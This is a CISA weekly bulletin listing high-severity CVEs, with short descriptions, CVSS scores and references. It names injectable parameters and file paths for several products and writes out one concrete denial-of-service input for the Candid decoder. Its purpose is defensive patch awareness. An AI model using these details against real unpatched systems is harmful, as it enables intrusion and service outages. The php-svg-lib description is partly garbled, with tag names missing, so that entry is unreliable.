CISA Bulletins - Vulnerability Summary for the Week of December 11, 2023

CISA · Dec 18, 2023

High Vulnerabilities

Primary Vendor -- Product	Description	Published	CVSS Score	Source & Patch Info
acronis -- cyber_protect_home_office	Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40901.	2023-12-12	7.8	CVE-2023-48677 [email protected]
adobe -- after_effects	Adobe After Effects versions 24.0.3 (and earlier) and 23.6.0 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2023-12-13	7.8	CVE-2023-48632 [email protected]
adobe -- after_effects	Adobe After Effects versions 24.0.3 (and earlier) and 23.6.0 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2023-12-13	7.8	CVE-2023-48633 [email protected]
adobe -- after_effects	Adobe After Effects versions 24.0.3 (and earlier) and 23.6.0 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2023-12-13	7.8	CVE-2023-48634 [email protected]
adobe -- illustrator	Adobe Illustrator versions 28.0 (and earlier) and 27.9 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2023-12-13	7.8	CVE-2023-47063 [email protected]
adobe -- illustrator	Adobe Illustrator versions 28.0 (and earlier) and 27.9 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2023-12-13	7.8	CVE-2023-47074 [email protected]
adobe -- illustrator	Adobe Illustrator versions 28.0 (and earlier) and 27.9 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2023-12-13	7.8	CVE-2023-47075 [email protected]
adobe -- substance_3d_designer	Adobe Substance 3D Designer versions 13.0.0 (and earlier) and 13.1.0 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2023-12-13	7.8	CVE-2023-48639 [email protected]
adobe -- substance_3d_sampler	Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2023-12-13	7.8	CVE-2023-48625 [email protected]
adobe -- substance_3d_sampler	Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2023-12-13	7.8	CVE-2023-48626 [email protected]
adobe -- substance_3d_sampler	Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2023-12-13	7.8	CVE-2023-48627 [email protected]
adobe -- substance_3d_sampler	Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2023-12-13	7.8	CVE-2023-48628 [email protected]
adobe -- substance_3d_sampler	Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2023-12-13	7.8	CVE-2023-48629 [email protected]
adobe -- substance_3d_sampler	Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2023-12-13	7.8	CVE-2023-48630 [email protected]
advplyr -- audiobookshelf	Audiobookshelf is a self-hosted audiobook and podcast server. In versions 2.4.3 and prior, users with the update permission are able to read arbitrary files, delete arbitrary files and send a GET request to arbitrary URLs and read the response. This issue may lead to Information Disclosure. As of time of publication, no patches are available.	2023-12-13	8.1	CVE-2023-47619 [email protected] [email protected]
advplyr -- audiobookshelf	Audiobookshelf is a self-hosted audiobook and podcast server. In versions 2.4.3 and prior, any user (regardless of their permissions) may be able to read files from the local file system due to a path traversal in the `/hls` endpoint. This issue may lead to Information Disclosure. As of time of publication, no patches are available.	2023-12-13	7.5	CVE-2023-47624 [email protected] [email protected]
afichet -- openexr_viewer	OpenEXR-viewer is a viewer for OpenEXR files with detailed metadata probing. Versions prior to 0.6.1 have a memory overflow vulnerability. This issue is fixed in version 0.6.1.	2023-12-11	9.8	CVE-2023-50245 [email protected] [email protected]
amttgroup -- hibos	A vulnerability, which was classified as critical, has been found in AMTT HiBOS 1.0. Affected by this issue is some unknown functionality. The manipulation of the argument Type leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247340. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.	2023-12-10	9.8	CVE-2023-6647 [email protected] [email protected] [email protected]
antonymale -- synctrayzor	SyncTrayzor 1.1.29 enables CEF (Chromium Embedded Framework) remote debugging, allowing a local attacker to control the application.	2023-12-09	7.8	CVE-2021-46899 [email protected] [email protected]
apereo -- opencast	An issue was discovered in Apereo Opencast 4.x through 10.x before 10.6. It sends system digest credentials during authentication attempts to arbitrary external services in some situations.	2023-12-12	7.5	CVE-2018-16153 [email protected] [email protected] [email protected] [email protected]
apple -- ipados	The issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.7.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1. Processing maliciously crafted input may lead to arbitrary code execution in user-installed apps.	2023-12-12	7.8	CVE-2023-40446 [email protected] [email protected] [email protected]
apple -- macos	Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.	2023-12-12	8.8	CVE-2023-42910 [email protected] [email protected]
apple -- macos	The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.2. Processing an image may lead to arbitrary code execution.	2023-12-12	7.8	CVE-2023-42882 [email protected] [email protected]
apple -- macos	An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2. A user may be able to cause unexpected app termination or arbitrary code execution.	2023-12-12	7.8	CVE-2023-42886 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected]
apple -- macos	Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.	2023-12-12	7.8	CVE-2023-42901 [email protected] [email protected]
apple -- macos	Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.	2023-12-12	7.8	CVE-2023-42902 [email protected] [email protected]
apple -- macos	Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.	2023-12-12	7.8	CVE-2023-42903 [email protected] [email protected]
apple -- macos	Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.	2023-12-12	7.8	CVE-2023-42904 [email protected] [email protected]
apple -- macos	Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.	2023-12-12	7.8	CVE-2023-42905 [email protected] [email protected]
apple -- macos	Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.	2023-12-12	7.8	CVE-2023-42906 [email protected] [email protected]
apple -- macos	Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.	2023-12-12	7.8	CVE-2023-42907 [email protected] [email protected]
apple -- macos	Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.	2023-12-12	7.8	CVE-2023-42908 [email protected] [email protected]
apple -- macos	Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.	2023-12-12	7.8	CVE-2023-42909 [email protected] [email protected]
apple -- macos	Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.	2023-12-12	7.8	CVE-2023-42911 [email protected] [email protected]
apple -- macos	Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.	2023-12-12	7.8	CVE-2023-42912 [email protected] [email protected]
apple -- macos	Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.	2023-12-12	7.8	CVE-2023-42926 [email protected] [email protected]
apple -- multiple_products	The issue was addressed with improved memory handling. This issue is fixed in Safari 17.2, macOS Sonoma 14.2, watchOS 10.2, iOS 17.2 and iPadOS 17.2, tvOS 17.2. Processing web content may lead to arbitrary code execution.	2023-12-12	8.8	CVE-2023-42890 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected]
apple -- multiple_products	The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2, macOS Ventura 13.6.3, tvOS 17.2, iOS 16.7.3 and iPadOS 16.7.3, macOS Monterey 12.7.2. Processing an image may lead to arbitrary code execution.	2023-12-12	7.8	CVE-2023-42899 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected]
archerirm -- archer	Archer Platform 6.x before 6.14 P1 HF2 (6.14.0.1.2) contains an insecure direct object reference vulnerability. An authenticated malicious user in a multi-instance installation could potentially exploit this vulnerability by manipulating application resource references in user requests to bypass authorization checks, in order to gain execute access to AWF application resources.	2023-12-12	8.8	CVE-2023-48641 [email protected]
armorx_global_technology_corporation -- armorx_spam	ArmorX Global Technology Corporation ArmorX Spam has insufficient validation for user input within a special function. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database.	2023-12-15	9.8	CVE-2023-48384 [email protected]
asterisk -- asterisk	Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the 'update' functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the 'update' functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa.	2023-12-14	7.5	CVE-2023-37457 [email protected] [email protected]
asterisk -- asterisk	Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6.	2023-12-14	7.5	CVE-2023-49786 [email protected] [email protected] [email protected] [email protected] [email protected]
beyondtrust -- privilege_management_for_mac	An issue was discovered in BeyondTrust Privilege Management for Mac before 5.7. An authenticated, unprivileged user can elevate privileges by running a malicious script (that executes as root from a temporary directory) during install time. (This applies to macOS before 10.15.5, or Security Update 2020-003 on Mojave and High Sierra, Later versions of macOS are not vulnerable.)	2023-12-11	8.8	CVE-2021-3187 [email protected] [email protected]
beyondtrust -- privilege_management_for_windows	An issue was discovered in BeyondTrust Privilege Management for Windows through 5.6. An attacker can spawn a process with multiple users as part of the security token (prior to Avecto elevation). When Avecto elevates the process, it removes the user who is launching the process, but not the second user. Therefore this second user still retains access and can give permission to the process back to the first user.	2023-12-11	8.8	CVE-2020-12613 [email protected] [email protected]
beyondtrust -- privilege_management_for_windows	An issue was discovered in BeyondTrust Privilege Management for Windows through 5.6. When specifying a program to elevate, it can typically be found within the Program Files (x86) folder and therefore uses the %ProgramFiles(x86)% environment variable. However, when this same policy gets pushed to a 32bit machine, this environment variable does not exist. Therefore, since the standard user can create a user level environment variable, they can repoint this variable to any folder the user has full control of. Then, the folder structure can be created in such a way that a rule matches and arbitrary code runs elevated.	2023-12-12	7.8	CVE-2020-12612 [email protected] [email protected]
beyondtrust -- privilege_management_for_windows	An issue was discovered in BeyondTrust Privilege Management for Windows through 5.6. If the publisher criteria is selected, it defines the name of a publisher that must be present in the certificate (and also requires that the certificate is valid). If an Add Admin token is protected by this criteria, it can be leveraged by a malicious actor to achieve Elevation of Privileges from standard user to administrator.	2023-12-12	7.8	CVE-2020-12614 [email protected] [email protected]
beyondtrust -- privilege_management_for_windows	An issue was discovered in BeyondTrust Privilege Management for Windows through 5.6. When adding the Add Admin token to a process, and specifying that it runs at medium integrity with the user owning the process, this security token can be stolen and applied to arbitrary processes.	2023-12-12	7.8	CVE-2020-12615 [email protected] [email protected]
beyondtrust -- privilege_management_for_windows	In BeyondTrust Privilege Management for Windows (aka PMfW) through 5.7, a SYSTEM installation causes Cryptbase.dll to be loaded from the user-writable location %WINDIR%\Temp.	2023-12-12	7.8	CVE-2020-28369 [email protected] [email protected]
campcodes -- student_clearance_system	A vulnerability, which was classified as critical, has been found in Campcodes Web-Based Student Clearance System 1.0. This issue affects some unknown processing of the file /libsystem/login.php. The manipulation of the argument student leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247367.	2023-12-11	7.5	CVE-2023-6659 [email protected] [email protected] [email protected]
checkmk_gmbh -- checkmk	Usage of user controlled LD_LIBRARY_PATH in agent in Checkmk 2.2.0p10 up to 2.2.0p16 allows malicious Checkmk site user to escalate rights via injection of malicious libraries	2023-12-13	8.8	CVE-2023-31210 [email protected]
code-projects -- matrimonial_site	A vulnerability was found in code-projects Matrimonial Site 1.0. It has been classified as critical. Affected is an unknown function of the file /auth/auth.php?user=1. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247344.	2023-12-10	9.8	CVE-2023-6651 [email protected] [email protected] [email protected]
code-projects -- matrimonial_site	A vulnerability was found in code-projects Matrimonial Site 1.0. It has been declared as critical. Affected by this vulnerability is the function register of the file /register.php. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247345 was assigned to this vulnerability.	2023-12-10	9.8	CVE-2023-6652 [email protected] [email protected] [email protected]
collaboraoffice -- richdocumentscode	Collabora Online is a collaborative online office suite based on LibreOffice technology. Unlike a standalone dedicated Collabora Online server, the Built-in CODE Server (richdocumentscode) is run without chroot sandboxing. Vulnerable versions of the richdocumentscode app can be susceptible to attack via modified client->server commands to overwrite files outside the sub directory the server has provided for the transient session. Files which can be accessed are limited to those that the server process has access to. The bug was fixed in Collabora Online - Built-in CODE Server (richdocumentscode) release 23.5.602. Users are advised to upgrade. There are no known workarounds for this vulnerability.	2023-12-08	7.2	CVE-2023-49788 [email protected]
crocoblock -- jetblocks_for_elementor	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetBlocks For Elementor allows Reflected XSS.This issue affects JetBlocks For Elementor: from n/a through 1.3.8.	2023-12-14	7.1	CVE-2023-48756 [email protected]
dasan_networks -- dasan_networks	Dasan Networks - W-Web versions 1.22-1.27 - CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')	2023-12-13	9.8	CVE-2023-42495 [email protected]
dedebiz -- dedebiz	A vulnerability was found in DedeBIZ 6.2 and classified as critical. This issue affects some unknown processing of the file /src/admin/content_batchup_action.php. The manipulation of the argument endid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247883. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.	2023-12-13	7.2	CVE-2023-6755 [email protected] [email protected] [email protected]
dell -- _vapp_manger	Dell vApp Manger, versions prior to 9.2.4.x contain an arbitrary file read vulnerability. A remote attacker could potentially exploit this vulnerability to read arbitrary files from the target system.	2023-12-14	7.5	CVE-2023-48660 [email protected]
dell -- _vapp_manger	Dell vApp Manager, versions prior to 9.2.4.x contain a command injection vulnerability. A remote malicious user with high privileges could potentially exploit this vulnerability leading to the execution of arbitrary OS commands on the affected system.	2023-12-14	7.2	CVE-2023-48662 [email protected]
dell -- _vapp_manger	Dell vApp Manager, versions prior to 9.2.4.x contain a command injection vulnerability. A remote malicious user with high privileges could potentially exploit this vulnerability leading to the execution of arbitrary OS commands on the affected system.	2023-12-14	7.2	CVE-2023-48663 [email protected]
dell -- _vapp_manger	Dell vApp Manager, versions prior to 9.2.4.x contain a command injection vulnerability. A remote malicious user with high privileges could potentially exploit this vulnerability leading to the execution of arbitrary OS commands on the affected system.	2023-12-14	7.2	CVE-2023-48664 [email protected]
dell -- _vapp_manger	Dell vApp Manager, versions prior to 9.2.4.x contain a command injection vulnerability. A remote malicious user with high privileges could potentially exploit this vulnerability leading to the execution of arbitrary OS commands on the affected system.	2023-12-14	7.2	CVE-2023-48665 [email protected]
dell -- _vapp_manger	Dell vApp Manager, versions prior to 9.2.4.x contain an information disclosure vulnerability. A remote attacker could potentially exploit this vulnerability leading to obtain sensitive information that may aid in further attacks.	2023-12-14	7.5	CVE-2023-48671 [email protected]
dell -- poweredge_r660_firmware	Dell PowerEdge BIOS contains an improper privilege management security vulnerability. An unauthenticated local attacker could potentially exploit this vulnerability, leading to privilege escalation.	2023-12-08	7.8	CVE-2023-32460 [email protected]
dell -- powerprotect_dd	Dell PowerProtect DD , versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain a DOM-based Cross-Site Scripting vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to the injection of malicious HTML or JavaScript code to a victim user's DOM environment in the browser. . Exploitation may lead to information disclosure, session theft, or client-side request forgery.	2023-12-14	8.8	CVE-2023-44286 [email protected]
dell -- powerprotect_dd	Dell PowerProtect DD, versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 on DDMC contain an OS command injection vulnerability in an admin operation. A local high privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the managed system application's underlying OS with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker on a managed system of DDMC.	2023-12-14	8.2	CVE-2023-48668 [email protected]
dell -- powerprotect_dd	Dell PowerProtect DD, versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain an OS command injection vulnerability in the CLI. A local low privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker.	2023-12-14	7.8	CVE-2023-44277 [email protected]
dell -- powerprotect_dd	Dell PowerProtect DD, versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain an improper access control vulnerability. A local malicious user with low privileges could potentially exploit this vulnerability leading to escalation of privilege.	2023-12-14	7.8	CVE-2023-44285 [email protected]
dell -- powerprotect_dd	Dell PowerProtect DD, versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain an OS command injection vulnerability in administrator CLI. A remote high privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS to bypass security restriction. Exploitation may lead to a system take over by an attacker.	2023-12-14	7.2	CVE-2023-48667 [email protected]
devolutions -- remote_desktop_manager	Client side permission bypass in Devolutions Remote Desktop Manager 2023.3.4.0 and earlier on iOS allows an attacker that has access to the application to execute entries in a SQL data source without restriction.	2023-12-12	9.8	CVE-2023-6593 [email protected]
dfinity -- candid	The Candid library causes a Denial of Service while parsing a specially crafted payload with 'empty' data type. For example, if the payload is `record { * ; empty }` and the canister interface expects `record { * }` then the Rust candid decoder treats empty as an extra field required by the type. The problem with the type empty is that the candid Rust library wrongly categorizes empty as a recoverable error when skipping the field and thus causing an infinite decoding loop. Canisters using affected versions of candid are exposed to denial of service by causing the decoding to run indefinitely until the canister traps due to reaching maximum instruction limit per execution round. Repeated exposure to the payload will result in degraded performance of the canister. Note: Canisters written in Motoko are unaffected.	2023-12-08	7.5	CVE-2023-6245 6b35d637-e00f-4228-858c-b20ad6e1d07b 6b35d637-e00f-4228-858c-b20ad6e1d07b 6b35d637-e00f-4228-858c-b20ad6e1d07b 6b35d637-e00f-4228-858c-b20ad6e1d07b 6b35d637-e00f-4228-858c-b20ad6e1d07b
dockge.kuma -- dockge	Uptime Kuma is an easy-to-use self-hosted monitoring tool. Prior to version 1.23.9, the application uses WebSocket (with Socket.io), but it does not verify that the source of communication is valid. This allows third-party website to access the application on behalf of their client. When connecting to the server using Socket.IO, the server does not validate the `Origin` header leading to other site being able to open connections to the server and communicate with it. Other websites still need to authenticate to access most features, however this can be used to circumvent firewall protections made in place by people deploying the application. Without origin validation, Javascript executed from another origin would be allowed to connect to the application without any user interaction. Without login credentials, such a connection is unable to access protected endpoints containing sensitive data of the application. However, such a connection may allow attacker to further exploit unseen vulnerabilities of the application. Users with "No-auth" mode configured who are relying on a reverse proxy or firewall to provide protection to the application would be especially vulnerable as it would grant the attacker full access to the application. In version 1.23.9, additional verification of the HTTP Origin header has been added to the socket.io connection handler. By default, if the `Origin` header is present, it would be checked against the Host header. Connection would be denied if the hostnames do not match, which would indicate that the request is cross-origin. Connection would be allowed if the `Origin` header is not present. Users can override this behavior by setting environment variable `UPTIME_KUMA_WS_ORIGIN_CHECK=bypass`.	2023-12-11	8.8	CVE-2023-49805 [email protected] [email protected]
dockge.kuma -- dockge	Uptime Kuma is an easy-to-use self-hosted monitoring tool. Prior to version 1.23.9, when a user changes their login password in Uptime Kuma, a previously logged-in user retains access without being logged out. This behavior persists consistently, even after system restarts or browser restarts. This vulnerability allows unauthorized access to user accounts, compromising the security of sensitive information. The same vulnerability was partially fixed in CVE-2023-44400, but logging existing users out of their accounts was forgotten. To mitigate the risks associated with this vulnerability, the maintainers made the server emit a `refresh` event (clients handle this by reloading) and then disconnecting all clients except the one initiating the password change. It is recommended to update Uptime Kuma to version 1.23.9.	2023-12-11	7.8	CVE-2023-49804 [email protected] [email protected] [email protected]
dompdf -- php-svg-lib	php-svg-lib is an SVG file parsing / rendering library. Prior to version 0.5.1, when handling `tag that references an` tag, it merges the attributes from the `tag to the` tag. The problem pops up especially when the `href` attribute from the `` tag has not been sanitized. This can lead to an unsafe file read that can cause PHAR Deserialization vulnerability in PHP prior to version 8. Version 0.5.1 contains a patch for this issue.	2023-12-12	9.8	CVE-2023-50252 [email protected] [email protected]
dompdf -- php-svg-lib	php-svg-lib is an SVG file parsing / rendering library. Prior to version 0.5.1, when parsing the attributes passed to a `use` tag inside an svg document, an attacker can cause the system to go to an infinite recursion. Depending on the system configuration and attack pattern this could exhaust the memory available to the executing process and/or to the server itself. An attacker sending multiple request to a system to render the above payload can potentially cause resource exhaustion to the point that the system is unable to handle incoming request. Version 0.5.1 contains a patch for this issue.	2023-12-12	7.5	CVE-2023-50251 [email protected] [email protected]
draytek -- vigor167_firmware	An OS Command Injection in the CLI interface on DrayTek Vigor167 version 5.2.2, allows remote attackers to execute arbitrary system commands and escalate privileges via any account created within the web interface.	2023-12-09	9.8	CVE-2023-47254 [email protected] [email protected]
eclipse -- memory_analyzer	In Eclipse Memory Analyzer versions 0.7 to 1.14.0, report definition XML files are not filtered to prohibit document type definition (DTD) references to external entities. This means that if a user chooses to use a malicious report definition XML file containing an external entity reference to generate a report then Eclipse Memory Analyzer may access external files or URLs defined via a DTD in the report definition.	2023-12-11	7.1	CVE-2023-6194 [email protected] [email protected] [email protected]
elastic -- kibana	An issue was discovered by Elastic whereby sensitive information may be recorded in Kibana logs in the event of an error. Elastic has released Kibana 8.11.1 which resolves this issue. The error message recorded in the log may contain account credentials for the kibana_system user, API Keys, and credentials of Kibana end-users. The issue occurs infrequently, only if an error is returned from an Elasticsearch cluster, in cases where there is user interaction and an unhealthy cluster (for example, when returning circuit breaker or no shard exceptions).	2023-12-13	8	CVE-2023-46671 [email protected]
elastic -- kibana	An issue was discovered by Elastic whereby sensitive information may be recorded in Kibana logs in the event of an error or in the event where debug level logging is enabled in Kibana. Elastic has released Kibana 8.11.2 which resolves this issue. The messages recorded in the log may contain Account credentials for the kibana_system user, API Keys, and credentials of Kibana end-users, Elastic Security package policy objects which can contain private keys, bearer token, and sessions of 3rd-party integrations and finally Authorization headers, client secrets, local file paths, and stack traces. The issue may occur in any Kibana instance running an affected version that could potentially receive an unexpected error when communicating to Elasticsearch causing it to include sensitive data into Kibana error logs. It could also occur under specific circumstances when debug level logging is enabled in Kibana. Note: It was found that the fix for ESA-2023-25 in Kibana 8.11.1 for a similar issue was incomplete.	2023-12-13	8	CVE-2023-46675 [email protected]
elegant_digital_solutions -- commentluv	Server-Side Request Forgery (SSRF) vulnerability in Elegant Digital Solutions CommentLuv.This issue affects CommentLuv: from n/a through 3.0.4.	2023-12-15	7.2	CVE-2023-49159 [email protected]
emlog -- emlog	Emlog version pro2.1.14 was discovered to contain a SQL injection vulnerability via the uid parameter at /admin/media.php.	2023-12-12	7.2	CVE-2023-41623 [email protected]
enterprisedb -- postgres_advanced_server	An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It contain packages, standalone packages, and functions that run SECURITY DEFINER but are inadequately secured against search_path attacks.	2023-12-12	9.8	CVE-2023-41117 [email protected]
enterprisedb -- postgres_advanced_server	An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It may allow an authenticated user to bypass authorization requirements and access underlying implementation functions. When a superuser has configured file locations using CREATE DIRECTORY, these functions allow users to take a wide range of actions, including read, write, copy, rename, and delete.	2023-12-12	8.8	CVE-2023-41118 [email protected]
enterprisedb -- postgres_advanced_server	An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It contains the function _dbms_aq_move_to_exception_queue that may be used to elevate a user's privileges to superuser. This function accepts the OID of a table, and then accesses that table as the superuser by using SELECT and DML commands.	2023-12-12	8.8	CVE-2023-41119 [email protected]
espeak-ng -- espeak-ng	Espeak-ng 1.52-dev was discovered to contain a buffer-overflow via the function SetUpPhonemeTable at synthdata.c.	2023-12-12	7.8	CVE-2023-49990 [email protected]
espeak-ng -- espeak-ng	Espeak-ng 1.52-dev was discovered to contain a Stack Buffer Underflow via the function CountVowelPosition at synthdata.c.	2023-12-12	7.8	CVE-2023-49991 [email protected]
espeak-ng -- espeak-ng	Espeak-ng 1.52-dev was discovered to contain a Stack Buffer Overflow via the function RemoveEnding at dictionary.c.	2023-12-12	7.8	CVE-2023-49992 [email protected]
espeak-ng -- espeak-ng	Espeak-ng 1.52-dev was discovered to contain a Buffer Overflow via the function ReadClause at readclause.c.	2023-12-12	7.8	CVE-2023-49993 [email protected]
evershop -- evershop	An issue in EverShop NPM versions before v.1.0.0-rc.8 allows a remote attacker to obtain sensitive information and execute arbitrary code via the /deleteCustomer/route.json file.	2023-12-08	9.8	CVE-2023-46498 [email protected] [email protected]
evershop -- evershop	Directory Traversal vulnerability in EverShop NPM versions before v.1.0.0-rc.8 allows a remote attacker to obtain sensitive information via a crafted request to the DELETE function in api/files endpoint.	2023-12-08	8.3	CVE-2023-46496 [email protected] [email protected]
fortinet -- fortios	A double free in Fortinet FortiOS versions 7.0.0 through 7.0.5, FortiPAM version 1.0.0 through 1.0.3, 1.1.0 through 1.1.1 allows attacker to execute unauthorized code or commands via specifically crafted request.	2023-12-13	8.8	CVE-2023-41678 [email protected]
fortinet -- fortiportal	An improper neutralization of special elements used in a command ('Command Injection') vulnerability [CWE-77] in FortiPortal version 7.2.0, version 7.0.6 and below may allow a remote authenticated attacker with at least R/W permission to execute unauthorized commands via specifically crafted arguments in the Schedule System Backup page field.	2023-12-13	8.8	CVE-2023-48791 [email protected]
fortinet -- fortiproxy	A use of externally-controlled format string in Fortinet FortiProxy versions 7.2.0 through 7.2.4, 7.0.0 through 7.0.10, FortiOS versions 7.4.0, 7.2.0 through 7.2.4, 7.0.0 through 7.0.11, 6.4.0 through 6.4.12, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiPAM versions 1.0.0 through 1.0.3 allows attacker to execute unauthorized code or commands via specially crafted API requests.	2023-12-13	8.8	CVE-2023-36639 [email protected]
